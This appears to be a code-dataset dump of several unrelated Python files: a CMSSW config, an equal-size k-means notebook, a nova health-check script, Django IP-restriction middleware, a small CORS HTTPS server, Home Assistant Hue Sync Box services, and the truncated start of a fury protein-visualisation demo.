content stringlengths 5 1.05M |
|---|
import FWCore.ParameterSet.Config as cms
# Producer that packs simulated ECAL preshower (ES) digis into raw data,
# using the channel lookup table shipped with EventFilter/ESDigiToRaw.
esDigiToRaw = cms.EDProducer("ESDigiToRaw",
    debugMode = cms.untracked.bool(False),
    InstanceES = cms.string(''),
    Label = cms.string('simEcalPreshowerDigis'),
    LookupTable = cms.untracked.FileInPath('EventFilter/ESDigiToRaw/data/ES_lookup_table.dat')
)
# bypass zero suppression: in premixing stage 1 the digis are read directly
# from the 'mix' module, so repoint the input label for that workflow.
from Configuration.ProcessModifiers.premix_stage1_cff import premix_stage1
premix_stage1.toModify(esDigiToRaw, Label = 'mix')
|
#!/usr/bin/env python
# coding: utf-8
# <a href="https://colab.research.google.com/github/korymath/public_notebooks/blob/master/Building_Equal_Size_Clusters_Kyle_Mathewson_Sept_2019.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# # Imports
# In[1]:
# get_ipython().run_line_magic('matplotlib', 'inline')
import matplotlib.pyplot as plt
import seaborn as sns; sns.set()
import numpy as np
# sklearn.datasets.samples_generator was deprecated in scikit-learn 0.22 and
# removed in 0.24; make_blobs is importable from sklearn.datasets directly.
# Keep a fallback so the notebook still runs on very old installations.
try:
    from sklearn.datasets import make_blobs
except ImportError:
    from sklearn.datasets.samples_generator import make_blobs
from sklearn.cluster import KMeans
from collections import Counter
from scipy.spatial.distance import pdist
from scipy.spatial.distance import squareform
# Fixed seed so data generation and clustering are reproducible.
random_state = 1017
# # Generate and Visualize Data
# In[2]:
# Tiny toy problem: 6 points drawn as 3 blobs of 2 points each.
n_samples = 6
n_groups = 3
n_members = 2
# ensure that the calculus works out
assert n_groups * n_members == n_samples
X, y_true = make_blobs(n_samples=n_samples, centers=n_groups,
                       cluster_std=0.50, random_state=random_state)
plt.scatter(X[:, 0], X[:, 1], s=50);
# In[3]:
# Dump the raw coordinates, one point per line.
for x in X:
    print('{};'.format(x))
# # K-Means Clustering
# In[4]:
# Plain k-means baseline; generous n_init/max_iter to dodge bad local optima.
kmeans = KMeans(n_clusters=n_groups, n_init=100, max_iter=1000)
kmeans.fit(X)
labels = kmeans.predict(X)
plt.scatter(X[:, 0], X[:, 1], c=labels, s=50, cmap='viridis')
centers = kmeans.cluster_centers_
plt.scatter(centers[:, 0], centers[:, 1], c='black', s=200, alpha=0.5);
# In[5]:
# test the group size, AssertionError on failure
C = Counter(labels)
print('Group sizes: {}'.format(C))
try:
    assert list(C.values()) == [n_members] * n_groups
except AssertionError as e:
    print('Unequal group sizes')
# # (optional) Explicit Algorithm Details
# In[6]:
from sklearn.metrics import pairwise_distances_argmin
def find_clusters(X, n_groups, rseed=1017):
    """Plain Lloyd's-algorithm k-means, written out explicitly.

    Parameters
    ----------
    X : ndarray of shape (n_samples, n_features)
        Points to cluster.
    n_groups : int
        Number of clusters.
    rseed : int, optional
        Seed for the random choice of initial centers. Default 1017, the
        same value as the module-level ``random_state`` (inlined so the
        function is self-contained).

    Returns
    -------
    centers : ndarray of shape (n_groups, n_features)
    labels : ndarray of shape (n_samples,)
    """
    # 1. Randomly choose initial centers from the data points themselves.
    rng = np.random.RandomState(rseed)
    chosen = rng.permutation(X.shape[0])[:n_groups]
    centers = X[chosen]
    while True:
        # 2a. Assign each point to its closest center. Squared Euclidean
        # distance with first-match tie-breaking, matching the behavior of
        # sklearn.metrics.pairwise_distances_argmin which this replaces
        # (so the sklearn dependency is no longer needed here).
        sq_dists = ((X[:, None, :] - centers[None, :, :]) ** 2).sum(axis=-1)
        labels = np.argmin(sq_dists, axis=1)
        # 2b. Recompute each center as the mean of its assigned points.
        # A cluster that lost all of its points keeps its previous center
        # instead of producing a NaN mean (NaN centers never compare equal,
        # so the original loop could spin forever in that degenerate case).
        new_centers = np.array([
            X[labels == k].mean(0) if np.any(labels == k) else centers[k]
            for k in range(n_groups)
        ])
        # 2c. Converged once the centers stop moving.
        if np.all(centers == new_centers):
            break
        centers = new_centers
    return centers, labels
# Run the explicit implementation and plot the resulting labelling.
centers, labels = find_clusters(X=X, n_groups=n_groups)
plt.scatter(X[:, 0], X[:, 1], c=labels, s=50, cmap='viridis');
# # Limitations of K-Means
#
# 1. Global optimum not guaranteed
# 2. n_groups must be selected beforehand
# 3. limited to linear cluster boundaries
# 4. slow for large n_samples
# 5. group sizes unequal
# In[7]:
# To address limitation 1, we can increase n_init for different random
# starting points on centroids. We can also increase the number of iterations
# particularly if there is a small n_samples
# To address limitation 3, we can use spectral clustering
# use a kernel transformation to project the data into a higher dimension where
# a linear separation is possible.
# Allow k-means to discover non-linear boundaries.
from sklearn.cluster import SpectralClustering
model = SpectralClustering(n_clusters=n_groups, affinity='nearest_neighbors',
                           assign_labels='kmeans', n_neighbors=n_members,
                           n_init=100, random_state=random_state)
labels = model.fit_predict(X)
plt.scatter(X[:, 0], X[:, 1], c=labels, s=50, cmap='viridis');
# In[8]:
# test the group size, AssertionError on failure
C = Counter(labels)
print('Group sizes: {}'.format(C))
try:
    assert list(C.values()) == [n_members] * n_groups
except AssertionError as e:
    print('Unequal group sizes')
# # Contrained Group Size k-means Clustering
# In[9]:
def average_data_distance_error(n_groups, memberships, distances):
    """Mean of the per-cluster average pairwise distance.

    For each cluster label k, restrict ``distances`` to the rows/columns of
    the points assigned to k (self-distances included), take the mean of
    that sub-matrix, then average those per-cluster means over all
    ``n_groups`` clusters.
    """
    cluster_means = []
    for label in range(n_groups):
        # Indices of the data points currently assigned to this cluster.
        members = np.flatnonzero(memberships == label)
        submatrix = distances[np.ix_(members, members)]
        cluster_means.append(submatrix.mean())
    return sum(cluster_means) / n_groups
def cluster_equal_groups(data, n_groups=None, n_members=None, verbose=False):
    """Equal-size clustering via greedy pairwise membership exchanges.

    Starts from an ordinary (unconstrained) k-means labelling — which fixes
    the cluster sizes — then repeatedly swaps the memberships of point pairs
    whenever the swap lowers the average within-cluster distance, until a
    full sweep makes no improvement. Swapping preserves group sizes.

    Parameters
    ----------
    data : ndarray of shape (n_samples, n_features)
    n_groups : int, optional
        Number of clusters; derived from ``n_members`` if omitted.
    n_members : int, optional
        Target cluster size; derived from ``n_groups`` if omitted.
    verbose : bool, optional
        Print the running error for every candidate swap.

    Returns
    -------
    ndarray of shape (n_samples,)
        Cluster label for every data point.

    Raises
    ------
    ValueError
        If neither ``n_groups`` nor ``n_members`` is given.
    """
    n_samples, _ = data.shape
    # Given any two of (n_samples, n_groups, n_members) the third follows.
    # BUG FIX: the original raised when BOTH were supplied even though that
    # is a perfectly valid call; only reject the neither-given case.
    if n_groups is None and n_members is None:
        raise ValueError('must specify n_members and/or n_groups')
    if n_members is None:
        n_members = n_samples // n_groups
    elif n_groups is None:
        n_groups = n_samples // n_members
    # Full pairwise distance matrix, reused by every error evaluation.
    distances = squareform(pdist(data))
    # Initial membership from plain k-means.
    kmeans = KMeans(n_clusters=n_groups, n_init=100, max_iter=1000)
    kmeans.fit(data)
    memberships = kmeans.predict(data)
    current_err = average_data_distance_error(n_groups, memberships, distances)
    t = 1
    while True:
        past_err = current_err
        # Try exchanging the memberships of every unordered pair (a, b).
        for a in range(n_samples):
            for b in range(a):
                if memberships[a] == memberships[b]:
                    # Swapping within one cluster is a no-op; skip the
                    # (expensive) error re-evaluation.
                    continue
                memberships[a], memberships[b] = memberships[b], memberships[a]
                test_err = average_data_distance_error(n_groups, memberships,
                                                       distances)
                if verbose:
                    print("{}: {}<->{} E={}".format(t, a, b, current_err))
                if test_err < current_err:
                    # Improvement: keep the swap.
                    current_err = test_err
                else:
                    # No improvement: put them back.
                    memberships[a], memberships[b] = memberships[b], memberships[a]
        # Stop once a complete sweep makes no progress.
        if past_err == current_err:
            break
        t += 1
    return memberships
# In[10]:
# Larger experiment: 32 points in 8 equal groups, timed end-to-end.
import time
n_samples = 32
n_groups = 8
n_members = n_samples // n_groups
# ensure that the calculus works out
assert n_groups * n_members == n_samples
X, y_true = make_blobs(n_samples=n_samples,
                       centers=n_groups,
                       cluster_std=0.50,
                       random_state=random_state)
plt.scatter(X[:, 0], X[:, 1], s=50);
t0 = time.time()
labels = cluster_equal_groups(X, n_groups=n_groups, verbose=False)
t1 = time.time()
# test the group size, AssertionError on failure
C = Counter(labels)
print('Group sizes: {}'.format(C))
try:
    assert list(C.values()) == [n_members] * n_groups
    print('Success, group sizes are equal!')
except AssertionError as e:
    print('Unequal group sizes')
print('Equal group memberships found in {} s'.format(round(t1-t0, 2)))
# Plot the memberships
plt.scatter(X[:, 0], X[:, 1], c=labels, s=50, cmap='viridis');
# In[14]:
# Jittered regular grid: nx columns by ny rows in the unit square.
nx, ny = 4, 8
xs = np.linspace(0, 1, nx)
ys = np.linspace(0, 1, ny)
# NOTE(review): np.meshgrid returns a list of two (ny, nx) arrays; adding a
# single (ny, nx) noise draw broadcasts the SAME jitter onto both the x and
# y grids — confirm identical x/y noise is intended.
x, y = np.meshgrid(xs, ys) + np.random.normal(scale=0.01, size=(ny, nx))
print(x.shape, y.shape)
# In[15]:
# Flatten the two grids into an (nx*ny, 2) point array.
X = np.zeros(shape=(len(x.flatten()), 2))
X[:, 0] = x.flatten()
X[:, 1] = y.flatten()
plt.scatter(X[:, 0], X[:, 1], s=50);
# In[16]:
labels = cluster_equal_groups(X, n_groups=n_groups, verbose=False)
plt.scatter(X[:, 0], X[:, 1], c=labels, s=50, cmap='jet');
# test the group size, AssertionError on failure
C = Counter(labels)
print('Group sizes: {}'.format(C))
try:
    assert list(C.values()) == [n_members] * n_groups
except AssertionError as e:
    print('Unequal group sizes')
# In[17]:
# This import registers the 3D projection, but is otherwise unused.
from mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import
# Same experiment in three dimensions.
X, y_true = make_blobs(n_samples=n_samples,
                       centers=n_groups,
                       n_features=3,
                       cluster_std=0.50,
                       random_state=random_state)
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(X[:, 0], X[:, 1], X[:, 2], s=50)
# In[18]:
labels = cluster_equal_groups(X, n_groups=n_groups)
# In[19]:
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(X[:, 0], X[:, 1], X[:, 2], c=labels, s=50, cmap='viridis');
# In[20]:
# Scratch cells: quick REPL-style experiments with meshgrid-based indexing.
np.random.permutation(n_samples) % 4
# In[21]:
distances = squareform(pdist(X))
distances
# In[22]:
# NOTE(review): indexing with a *list* of arrays (no tuple()) was deprecated
# in NumPy 1.15 and is an error on modern NumPy — this scratch line only
# works on older versions.
distances[np.meshgrid((0,1), (0,1))]
# In[23]:
np.mean(distances[tuple(np.meshgrid([0,1], [0,1]))])
# In[24]:
distances[tuple(np.meshgrid([2,3], [2,3]))]
# In[25]:
np.meshgrid([1,2,3],[1,2,3])
# distances[tuple(np.meshgrid([1,2,3],[1,2,3]))]
# In[26]:
memberships = np.random.permutation(n_samples) % n_groups
np.where(memberships == 3)[0]
# In[27]:
tuple(np.meshgrid([1,2,3], [1,2,3])[0])
# In[28]:
# NOTE(review): same deprecated list-of-arrays indexing as In[22].
distances[np.meshgrid([1,2,3], [1,2,3])]
# In[30]:
X
# In[31]:
# Largest experiment: 128 points in 16 groups of 8.
n_samples = 128
n_groups = 16
n_members = 8
# ensure that the calculus works out
assert n_groups * n_members == n_samples
X, y_true = make_blobs(n_samples=n_samples, centers=n_groups,
                       cluster_std=0.50, random_state=random_state)
plt.scatter(X[:, 0], X[:, 1], s=50);
|
#!/usr/bin/python
from prettytable import PrettyTable
from nova import compute
from nova import objects
from nova import servicegroup
from nova.context import RequestContext
import nova.scheduler.host_manager as host_manager
from nova.objects import resource_provider as rp_obj
from nova import config
import sys
# ANSI escape sequences used to colour the percentage figures in the tables.
color_tbl = {
    "grey": '\033[1;30m',
    "green": '\033[32m',
    "blue": '\033[34m',
    "yellow": '\033[33m',
    "red": '\033[31m',
}
def colorizer(num):
    """Format a utilisation percentage, coloured by how loaded it is.

    <= 20 grey, <= 40 green, <= 60 blue, <= 80 yellow, above 80 red.
    """
    thresholds = (
        (20, 'grey'),
        (40, 'green'),
        (60, 'blue'),
        (80, 'yellow'),
    )
    colour = 'red'
    for limit, name in thresholds:
        if num <= limit:
            colour = name
            break
    return "%s%.2f%%\033[0m" % (color_tbl[colour], num)
# Parse nova configuration / CLI flags before touching any nova APIs.
config.parse_args(sys.argv)
# Request context shared by all of the checks below.
cxt = RequestContext()
# Register nova versioned objects before the host manager uses them.
host_manager.objects.register_all()
def check_services():
    # Report every non-API nova service that is down or disabled.
    # (Python 2 script: print statements throughout.)
    objects.register_all()
    host_api = compute.HostAPI()
    servicegroup_api = servicegroup.API()
    # API-level services are skipped from the liveness check.
    api_services = ('nova-osapi_compute', 'nova-ec2', 'nova-metadata')
    isOK = True
    print "============================ services check ============================"
    for s in host_api.service_get_all(cxt, set_zones=True, all_cells=True):
        if s['binary'] in api_services:
            continue
        if not servicegroup_api.service_is_up(s):
            isOK = False
            print "%s %s is down" % (s['host'], s['binary'])
        if s['disabled']:
            isOK = False
            print "%s %s is disabled" % (s['host'], s['binary'])
    if isOK:
        print "Service is OK"
def print_hypervisor_view():
    # Print one table row per hypervisor: CPU/RAM usage coloured by load
    # (relative to the allocation-ratio-adjusted capacity) plus VM counts.
    hm = host_manager.HostManager()
    tbl = PrettyTable(["hostname", "nodename", "updated","ip", "cpu", "cpu_ratio",
                       "ram", "ram_ratio", "vms", "active_vms", "other_vms"])
    tbl.align['hostname'] = 'l'
    tbl.align['ip'] = 'l'
    states = hm.get_all_host_states(cxt)
    for i in states:
        cpu = "%s/%s" % (i.vcpus_used, i.vcpus_total)
        # Fall back to vcpus_used so a host reporting 0 total cannot
        # divide by zero below.
        vcpus_total = i.vcpus_total or i.vcpus_used
        if vcpus_total:
            cpu_ratio = colorizer(i.vcpus_used * 100.0 / (vcpus_total * i.cpu_allocation_ratio))
        else:
            cpu_ratio = '-'
        ram_used = i.total_usable_ram_mb - i.free_ram_mb
        ram = "%s/%s" % (ram_used, i.total_usable_ram_mb)
        total_usable_ram_mb = i.total_usable_ram_mb or ram_used
        if total_usable_ram_mb:
            ram_ratio = colorizer(ram_used * 100.0 / (total_usable_ram_mb * i.ram_allocation_ratio))
        else:
            ram_ratio = '-'
        # NOTE(review): disk_used is computed but never displayed — confirm
        # whether a disk column was intended.
        disk_used = i.disk_mb_used/1024.0
        num_instances = 0
        if 'num_instances' in i.stats:
            num_instances = i.stats['num_instances']
        num_vm_active = 0
        if 'num_vm_active' in i.stats:
            num_vm_active = i.stats['num_vm_active']
        num_vm_others = int(num_instances) - int(num_vm_active)
        tbl.add_row([i.host, i.nodename, i.updated, i.host_ip,
                     cpu, cpu_ratio,
                     ram, ram_ratio,
                     num_instances, num_vm_active, num_vm_others])
    print "============================ Hypervisor resource ============================"
    print tbl.get_string(sortby="ip")
def alloction_check():
    # Cross-check each compute node: the set of VM UUIDs the HostManager
    # reports on the node must match the consumer ids recorded in the
    # placement allocations for that resource provider.
    # (Name keeps the original 'alloction' typo: it is called by this
    # name at module level.)
    print "============================ alloction check ============================"
    tbl = PrettyTable(["status", "hostname", "nodename", "vm_in_nodes","vm_in_allocations"])
    tbl.align['hostname'] = 'l'
    tbl.align['nodename'] = 'l'
    hm = host_manager.HostManager()
    states = hm.get_all_host_states(cxt)
    node_vm_map = {}
    for i in states:
        rp = rp_obj.ResourceProvider.get_by_uuid(cxt, i.uuid)
        node_vm_map.setdefault(rp.name, set())
        # Collect the VM uuids that the host state says live on each node.
        for j in i.instances:
            #Note(fanzhang): j should one Instance object which means instance on node.
            inst = i.instances[j]
            node_name = inst.node
            node_vm_map.setdefault(node_name, set())
            node_vm_map[node_name].add(inst.uuid)
        # Consumer ids from the placement allocations of this provider.
        db_allocs = rp_obj._get_allocations_by_provider_id(cxt, rp.id)
        vms_in_allocation = set()
        for j in db_allocs:
            vms_in_allocation.add(j['consumer_id'])
        vm_in_nodes = node_vm_map[rp.name]
        #msg = "%s(%s, %s)\033[0m: vm in nodes: %s <-> vm in allocations: %s"
        if vm_in_nodes == vms_in_allocation:
            hint = "%s%s\033[0m" % (color_tbl['green'], 'OK')
            hostname = "%s%s\033[0m" % (color_tbl['blue'], i.host)
            nodename = "%s%s\033[0m" % (color_tbl['yellow'], i.nodename)
            #print msg % (color_tbl['green'], i.host, i.nodename, len(vm_in_nodes), len(vms_in_allocation))
        else:
            hint = "%s%s\033[0m" % (color_tbl['red'], 'X')
            hostname = "%s%s\033[0m" % (color_tbl['red'], i.host)
            nodename = "%s%s\033[0m" % (color_tbl['red'], i.nodename)
            #print msg % (color_tbl['red'], i.host, i.nodename, len(vm_in_nodes), len(vms_in_allocation))
            #print vms_in_allocation - vm_in_nodes
            #print vm_in_nodes - vms_in_allocation
        tbl.add_row([hint, hostname, nodename, len(vm_in_nodes), len(vms_in_allocation)])
    print tbl.get_string(sortby='hostname')
# Run all three reports when this script is executed.
check_services()
print_hypervisor_view()
alloction_check()
|
from django.http import HttpResponseRedirect
from django.conf import settings
from django.http import Http404
import re
from ipaddress import ip_address
from ipaddress import ip_network
TRUSTED_URLS = getattr(settings, 'TRUSTED_URLS', [])
TRUSTED_IPS = getattr(settings, 'TRUSTED_IPS', ['127.0.0.1/32'])
class IPAddressList(list):
    """A list of ip_network objects that supports `in` tests on addresses.

    ``"10.1.2.3" in IPAddressList("10.0.0.0/8")`` is true when the address
    falls inside any of the stored networks.
    """
    def __init__(self, *ips):
        super().__init__()
        for cidr in ips:
            self.append(ip_network(cidr))
    def __contains__(self, address):
        candidate = ip_address(address)
        for network in self:
            if candidate in network:
                return True
        return False
class PermissionsMiddleware(object):
    """Keep superusers under /staff/ URLs and everyone else under /users/.

    Redirects a request that arrives on the prefix belonging to the other
    role; returns None (continue normal processing) otherwise.
    """
    def process_request(self, request):
        if request.user.is_superuser:
            wrong_prefix, right_prefix = '/users/', '/staff/'
        else:
            wrong_prefix, right_prefix = '/staff/', '/users/'
        if request.path.startswith(wrong_prefix):
            return HttpResponseRedirect(
                request.path.replace(wrong_prefix, right_prefix))
def get_client_address(request):
    """Return the client IP for *request* in exploded form, or None.

    Trusts at most ``settings.TRUSTED_PROXIES`` (default 2) proxy hops:
    when an X-Forwarded-For header is present, the entry *depth* positions
    from the end is used; a shorter header yields None rather than trusting
    a client-spoofable value. Without the header, REMOTE_ADDR is used.

    Raises ValueError if the selected header entry / REMOTE_ADDR is not a
    valid IP address (propagated from ``ip_address``).
    """
    depth = getattr(settings, 'TRUSTED_PROXIES', 2)
    if 'HTTP_X_FORWARDED_FOR' in request.META:
        header = request.META['HTTP_X_FORWARDED_FOR']
        hops = [hop.strip() for hop in header.split(',')]
        # Too few entries means the request did not pass through all of our
        # trusted proxies; report the client address as unknown.
        address = ip_address(hops[-depth]) if len(hops) >= depth else None
    else:
        address = ip_address(request.META['REMOTE_ADDR'])
    # Explicit None check replaces the dated `a and a.exploded or a` idiom.
    return address.exploded if address is not None else None
class TrustedAccessMiddleware(object):
    """Restrict the TRUSTED_URLS paths to clients listed in TRUSTED_IPS.

    Requests for a protected path from an untrusted address raise Http404;
    template responses on protected paths get an ``internal_request``
    context flag indicating whether the client is trusted.
    """
    @staticmethod
    def _is_protected_path(path):
        # A path is protected when any TRUSTED_URLS pattern matches it.
        for pattern in TRUSTED_URLS:
            if re.match(pattern, path):
                return True
        return False
    def process_request(self, request):
        client_address = get_client_address(request)
        if not self._is_protected_path(request.path):
            return
        trusted_addresses = IPAddressList(*TRUSTED_IPS)
        if client_address not in trusted_addresses:
            raise Http404()
    def process_template_response(self, request, response):
        client_address = get_client_address(request)
        if self._is_protected_path(request.path):
            trusted_addresses = IPAddressList(*TRUSTED_IPS)
            if response.context_data:
                response.context_data['internal_request'] = (
                    client_address in trusted_addresses)
        return response
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
# Webkit HTTPS Server with CORS
# (c) 2017-2019 Radu.I
# Version string printed at startup.
uxmScriptVersion = 'v.20190710.1159'
import BaseHTTPServer, SimpleHTTPServer
import ssl
import os, sys, signal
# Port may be supplied as the first CLI argument; default 4443.
if sys.argv[1:]:
    port = int(sys.argv[1])
else:
    port = 4443
# Serve static files from the 'web' directory next to this script.
web_dir = os.path.join(os.path.dirname(__file__), 'web')
os.chdir(web_dir)
class CORSHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    # Static-file handler that adds a permissive CORS header to every reply.
    def end_headers(self):
        # Inject extra headers just before the header section is closed.
        self.send_my_headers()
        SimpleHTTPServer.SimpleHTTPRequestHandler.end_headers(self)
    def send_my_headers(self):
        # Allow any origin to fetch resources from this server.
        self.send_header("Access-Control-Allow-Origin", "*")
# Use the CORS-enabled handler (swap the commented line in to disable CORS).
requestHandler = CORSHTTPRequestHandler
#requestHandler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = BaseHTTPServer.HTTPServer(('localhost', port), requestHandler)
# Wrap the listening socket in TLS using the certificate one level up.
# NOTE(review): ssl.wrap_socket is deprecated on modern Python; acceptable
# for the Python 2.7 runtime this script targets.
httpd.socket = ssl.wrap_socket(httpd.socket, certfile='../cert.pem', server_side=True)
#httpd.serve_forever()
# A custom signal handler so Ctrl-C shuts the server down cleanly.
def signal_handler(signum, frame):
    """SIGINT handler: close the server socket and always exit.

    The first parameter was previously named ``signal``, which shadowed the
    imported ``signal`` module inside the handler; renamed to the
    conventional ``signum``.
    """
    print('Exiting HTTPS server (Ctrl+C pressed)')
    try:
        if httpd:
            httpd.server_close()
    finally:
        # Exit even if closing the socket failed.
        sys.exit(0)
# Install the keyboard interrupt handler
signal.signal(signal.SIGINT, signal_handler)
# Now loop forever, restarting serve_forever if it ever returns.
try:
    print('Starting HTTPS Server.Py (' + uxmScriptVersion + ') on localhost:' + str(port) + ' (press Ctrl+C to Stop ...)')
    while True:
        sys.stdout.flush()
        httpd.serve_forever()
except KeyboardInterrupt:
    # Fallback shutdown path if the signal handler did not fire.
    pass
httpd.server_close()
#END
|
"""Defines services that Hue Sync Box component supports."""
import logging
import voluptuous
from homeassistant.helpers import config_validation
from homeassistant.helpers import service
from . import const
_LOGGER = logging.getLogger(__name__)
# Voluptuous validation schemas for the custom service-call payloads below.
GET_ACCESS_TOKEN_SCHEMA = config_validation.make_entity_service_schema({})
SET_AREA_SCHEMA = config_validation.make_entity_service_schema({
    voluptuous.Required(const.ATTR_AREA_NAME): config_validation.string,
})
SET_BRIGHTNESS_SCHEMA = config_validation.make_entity_service_schema({
    voluptuous.Required(const.ATTR_BRIGHTNESS): config_validation.positive_int,
})
SET_HDMI_INPUT_SCHEMA = config_validation.make_entity_service_schema({
    voluptuous.Required(const.ATTR_HDMI_INPUT): config_validation.string,
})
SET_INTENSITY_SCHEMA = config_validation.make_entity_service_schema({
    voluptuous.Required(const.ATTR_INTENSITY): config_validation.string,
    voluptuous.Optional(const.ATTR_SYNC_MODE): config_validation.string,
})
SET_SYNC_MODE_SCHEMA = config_validation.make_entity_service_schema({
    voluptuous.Required(const.ATTR_SYNC_MODE): config_validation.string,
})
def register_services(hass):
    """Registers custom services for hue_sync_box.

    Each service gets its handler from the matching ``create_*`` factory
    and is validated against its voluptuous schema.
    """
    _LOGGER.debug('Registering services for Hue Sync Box.')
    get_access_token_service = create_get_access_token_service(hass)
    hass.services.async_register(
        const.DOMAIN,
        const.SERVICE_GET_ACCESS_TOKEN,
        get_access_token_service,
        schema=GET_ACCESS_TOKEN_SCHEMA,
    )
    set_area_service = create_set_area(hass)
    hass.services.async_register(
        const.DOMAIN,
        const.SERVICE_SET_AREA,
        set_area_service,
        schema=SET_AREA_SCHEMA,
    )
    # BUG FIX: this previously registered the get_access_token handler for
    # the set_brightness service (create_set_brightness was never used).
    set_brightness_service = create_set_brightness(hass)
    hass.services.async_register(
        const.DOMAIN,
        const.SERVICE_SET_BRIGHTNESS,
        set_brightness_service,
        schema=SET_BRIGHTNESS_SCHEMA,
    )
    set_hdmi_input_service = create_set_hdmi_input_service(hass)
    hass.services.async_register(
        const.DOMAIN,
        const.SERVICE_SET_HDMI_INPUT,
        set_hdmi_input_service,
        schema=SET_HDMI_INPUT_SCHEMA,
    )
    set_intensity_service = create_set_intensity_service(hass)
    hass.services.async_register(
        const.DOMAIN,
        const.SERVICE_SET_INTENSITY,
        set_intensity_service,
        schema=SET_INTENSITY_SCHEMA,
    )
    sync_mode_service = create_set_sync_mode_service(hass)
    hass.services.async_register(
        const.DOMAIN,
        const.SERVICE_SET_SYNC_MODE,
        sync_mode_service,
        schema=SET_SYNC_MODE_SCHEMA,
    )
def unregister_services(hass):
    """Unregisters custom services from hue_sync_box."""
    # Remove every service this integration registered, in the same order
    # register_services() added them.
    for service_name in (
            const.SERVICE_GET_ACCESS_TOKEN,
            const.SERVICE_SET_AREA,
            const.SERVICE_SET_BRIGHTNESS,
            const.SERVICE_SET_HDMI_INPUT,
            const.SERVICE_SET_INTENSITY,
            const.SERVICE_SET_SYNC_MODE,
    ):
        hass.services.async_remove(const.DOMAIN, service_name)
def create_get_access_token_service(hass):
    """Returns service for get_access_token."""
    async def async_get_access_token(call):
        # Debug message typo fixed: 'hue_syc_box' -> 'hue_sync_box'.
        _LOGGER.debug(
            f'hue_sync_box async_get_access_token handler called '
            f'with data: {call.data}.')
        entity_ids = call.data.get(const.ATTR_ENTITY_ID)
        for entity_id in entity_ids:
            entity = hass.data[const.DOMAIN].get(entity_id)
            # BUG FIX: previously tested the (always truthy) entity_id, so a
            # lookup miss crashed with AttributeError on None; test the
            # looked-up entity instead and skip unknown ids.
            if entity is not None:
                await entity.async_get_access_token()
    return async_get_access_token
def create_set_area(hass):
    """Returns service for set_area."""
    async def async_set_area(call):
        # Debug message typo fixed: 'hue_syc_box' -> 'hue_sync_box'.
        _LOGGER.debug(
            f'hue_sync_box async_set_area handler called '
            f'with data: {call.data}.')
        entity_ids = call.data.get(const.ATTR_ENTITY_ID)
        area_name = call.data.get(const.ATTR_AREA_NAME)
        for entity_id in entity_ids:
            entity = hass.data[const.DOMAIN].get(entity_id)
            # BUG FIX: test the looked-up entity, not the id, so an unknown
            # entity_id is skipped instead of crashing on None.
            if entity is not None:
                await entity.async_set_area(area_name)
    return async_set_area
def create_set_brightness(hass):
    """Returns service for set_brightness."""
    async def async_set_brightness(call):
        # Debug message typo fixed: 'hue_syc_box' -> 'hue_sync_box'.
        _LOGGER.debug(
            f'hue_sync_box async_set_brightness handler called '
            f'with data: {call.data}.')
        entity_ids = call.data.get(const.ATTR_ENTITY_ID)
        brightness = call.data.get(const.ATTR_BRIGHTNESS)
        for entity_id in entity_ids:
            entity = hass.data[const.DOMAIN].get(entity_id)
            # BUG FIX: test the looked-up entity, not the id, so an unknown
            # entity_id is skipped instead of crashing on None.
            if entity is not None:
                await entity.async_set_brightness(brightness)
    return async_set_brightness
def create_set_hdmi_input_service(hass):
    """Returns service for set_hdmi_input."""
    async def async_set_hdmi_input(call):
        # Debug message typo fixed: 'hue_syc_box' -> 'hue_sync_box'.
        _LOGGER.debug(
            f'hue_sync_box create_set_hdmi_input_service handler called '
            f'with data: {call.data}.')
        entity_ids = call.data.get(const.ATTR_ENTITY_ID)
        hdmi_input = call.data.get(const.ATTR_HDMI_INPUT)
        for entity_id in entity_ids:
            entity = hass.data[const.DOMAIN].get(entity_id)
            # BUG FIX: test the looked-up entity, not the id, so an unknown
            # entity_id is skipped instead of crashing on None.
            if entity is not None:
                await entity.async_set_hdmi_input(hdmi_input)
    return async_set_hdmi_input
def create_set_intensity_service(hass):
    """Returns service for set_intensity."""
    async def async_set_intensity(call):
        # Debug message typo fixed: 'hue_syc_box' -> 'hue_sync_box'.
        _LOGGER.debug(
            f'hue_sync_box async_set_intensity handler called '
            f'with data: {call.data}.')
        entity_ids = call.data.get(const.ATTR_ENTITY_ID)
        intensity = call.data.get(const.ATTR_INTENSITY)
        # sync_mode is optional in SET_INTENSITY_SCHEMA and may be None.
        sync_mode = call.data.get(const.ATTR_SYNC_MODE)
        for entity_id in entity_ids:
            entity = hass.data[const.DOMAIN].get(entity_id)
            # BUG FIX: test the looked-up entity, not the id, so an unknown
            # entity_id is skipped instead of crashing on None.
            if entity is not None:
                await entity.async_set_intensity(intensity, sync_mode)
    return async_set_intensity
def create_set_sync_mode_service(hass):
    """Returns service for set_sync_mode."""
    async def async_set_sync_mode(call):
        # Debug message typo fixed: 'hue_syc_box' -> 'hue_sync_box'.
        _LOGGER.debug(
            f'hue_sync_box async_set_sync_mode handler called '
            f'with data: {call.data}.')
        entity_ids = call.data.get(const.ATTR_ENTITY_ID)
        sync_mode = call.data.get(const.ATTR_SYNC_MODE)
        for entity_id in entity_ids:
            entity = hass.data[const.DOMAIN].get(entity_id)
            # BUG FIX: test the looked-up entity, not the id, so an unknown
            # entity_id is skipped instead of crashing on None.
            if entity is not None:
                await entity.async_set_sync_mode(sync_mode)
    return async_set_sync_mode
|
"""
======================================================================
Molecular Module Demo
======================================================================
A small example to show how to use the various molecular
representations present in the `molecular` module to visualize
proteins. This example also shows how to parse PDB files to obtain
atomic info essential for constructing the representations.
Importing necessary modules
"""
import urllib
import os
from fury import window, actor, ui, molecular as mol
import numpy as np
###############################################################################
# Downloading the PDB file of the protein to be rendered.
# User can change the pdb_code depending on which protein they want to
# visualize.
pdb_code = '4kb2'
downloadurl = "https://files.rcsb.org/download/"
pdbfn = pdb_code + ".pdb"
# flag records whether we downloaded the file (used by the cleanup section).
flag = 0
if not os.path.isfile(pdbfn):
    # BUG FIX: the top of the file only does `import urllib`, which does not
    # make the `urllib.request` submodule available; import it explicitly
    # before calling urlretrieve.
    import urllib.request
    flag = 1
    url = downloadurl + pdbfn
    outfnm = os.path.join(pdbfn)
    try:
